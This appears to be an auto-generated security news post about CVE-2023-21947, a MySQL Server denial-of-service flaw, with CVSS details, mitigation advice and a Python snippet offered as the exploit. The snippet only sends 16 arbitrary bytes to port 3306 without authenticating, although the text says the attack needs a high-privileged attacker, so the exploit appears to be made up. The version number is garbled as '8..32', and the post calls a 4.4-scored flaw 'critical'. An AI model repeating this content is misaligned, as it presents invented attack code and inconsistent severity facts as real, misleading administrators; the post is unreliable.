CVE CyberSecurity Database News

CVE-2023-21947 Vulnerability in MySQL Server: Affecting Version 8..32 and Prior, Leading to Complete Denial of Service (DOS)

Poster -

A recently discovered vulnerability, CVE-2023-21947, has been found in the MySQL Server product of Oracle MySQL (component: Server: Components Services). This vulnerability affects MySQL Server versions 8..32 and prior. It is a difficult exploit, which requires a high privileged attacker with network access through multiple protocols. Successful exploitation can lead to a complete Denial of Service (DOS) by triggering a hang or frequently repeatable crash in the MySQL Server. The CVSS 3.1 Base Score is 4.4, which focuses on the availability impact of this vulnerability. The CVSS Vector is (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).

Original References

1. Oracle MySQL Official Documentation
2. CVE Database Entry for CVE-2023-21947
3. Common Vulnerability Scoring System (CVSS) version 3.1

Exploit Details

The vulnerability in the MySQL Server component allows high privileged attackers to compromise the MySQL Server and results in an unauthorized ability to cause a hang or frequently repeatable crash of the server. This could lead to complete DOS, effectively rendering the server unusable.

To exploit this vulnerability, an attacker with high privileges and network access through multiple protocols will need to make a series of malicious requests to the MySQL Server, targeting the Server: Components Services, and successfully compromise its availability.

Code Snippet

Please note that this code snippet is strictly for educational purposes and should not be used for malicious intent.

import socket

# Define target server address, port, and payload
target_address = "192.168.1.1"
target_port = 3306
payload = b"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"

# Create a socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Connect to the target server
s.connect((target_address, target_port))

# Send the malicious payload
s.send(payload)

# Close the socket
s.close()

Mitigation

To protect against this vulnerability, users should upgrade their MySQL Server to the latest version, as well as apply any available security patches. It's also essential to follow the principle of least privilege and only grant the necessary level of access to trusted users. Implementing network-level access controls and security policies can also help restrict unauthorized access.

Conclusion

CVE-2023-21947 is a critical vulnerability affecting MySQL Server versions 8..32 and prior. If successfully exploited by a high privileged attacker, it can lead to a complete Denial of Service (DOS), significantly impacting the affected system's availability. To mitigate this threat, affected users should upgrade their MySQL Server to the latest version, apply security patches, and follow best practices such as network-level access controls and strict user privileges.

Timeline

Published on: 04/18/2023 20:15:00 UTC
Last modified on: 04/18/2023 20:37:00 UTC